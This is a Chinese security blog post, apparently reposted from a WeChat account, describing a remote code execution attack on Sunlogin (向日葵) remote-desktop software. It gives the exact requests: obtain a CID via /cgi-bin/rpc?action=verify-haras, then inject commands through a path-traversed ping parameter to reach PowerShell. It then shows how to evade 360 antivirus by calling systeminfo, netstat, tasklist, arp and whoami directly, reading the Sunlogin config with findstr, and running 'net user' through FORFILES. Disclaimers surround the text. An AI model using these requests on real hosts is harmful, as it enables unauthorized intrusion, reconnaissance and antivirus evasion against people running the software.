向日葵RCEbypass

admin 2024年9月14日17:55:17评论23 views字数 991阅读3分18秒阅读模式
本文仅用于技术研究学习,请遵守相关法律,禁止使用本文所提及的相关技术开展非法攻击行为,由于传播、利用本文所提供的信息而造成任何不良后果及损失,与本账号及作者无关。

关于无问社区

    无问社区致力于打造一个面向于网络安全从业人员的技术综合服务社区,可免费获取安全技术资料,社区可提供的技术资料覆盖全网,辅助学习的功能丰富。

特色功能:划词解析、调取同类技术资料、AI助手全网智能检索、基于推荐算法,为每一位用户量身定制专属技术资料。

无问社区-官网:http://wwlib.cn

无问社区站内阅读链接:

http://www.wwlib.cn/index.php/artread/artid/9157.html

1. 获取 CID

http://ip:port/cgi-bin/rpc?action=verify-haras

向日葵RCEbypass

2.借助 ping 命令进行拼接

修改 Cookie:CID=xxxxx

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershe   ll.exe+%20whoami

向日葵RCEbypass

当存在防护软件时执行命令会告警failed,error 5:表示命令执行失败

向日葵RCEbypass

我们可以先使用他的正常命令 ping 来查看命令执行漏洞是否存在

向日葵RCEbypass

我们从上图可以得知 360 是拦截了PowerShell 调用尝试调用CMD 执行命令看看

向日葵RCEbypass

发现CMD 调用和 PowerShell 调用都被拦截了,思路就此转换成不使用CMD 和 PowerShell

3执行命令

1.直接调用systeminfo.exe 获取操作系统信息

向日葵RCEbypass

2.直接调用 netstat.exe 获取操作系统信息

向日葵RCEbypass

3.直接调用tasklist.exe 来获得进程信息我们可以看到是存在 360 进程的

向日葵RCEbypass

4.直接调用ipconfig.exe 获得IP 信息

向日葵RCEbypass

5.直接调用arp.exe 获得内网其他IP

向日葵RCEbypass

6.直接调用whoami.exe 查看当前权限

向日葵RCEbypass

7.使用 findstr.exe 读取向日葵配置文件

向日葵RCEbypass

8.使用FORFILES调用 CMD 执行任意命令bypass 360 拦截(2022-06-26)

向日葵RCEbypass

使用FORFILES 执行 net user 成功执行

向日葵RCEbypass

正常调用 net.exe 执行 net user 被拦截

向日葵RCEbypass

向日葵RCEbypass

 

 

原文始发于微信公众号(白帽子社区团队):向日葵RCEbypass

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月14日17:55:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   向日葵RCEbypasshttps://cn-sec.com/archives/3169520.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息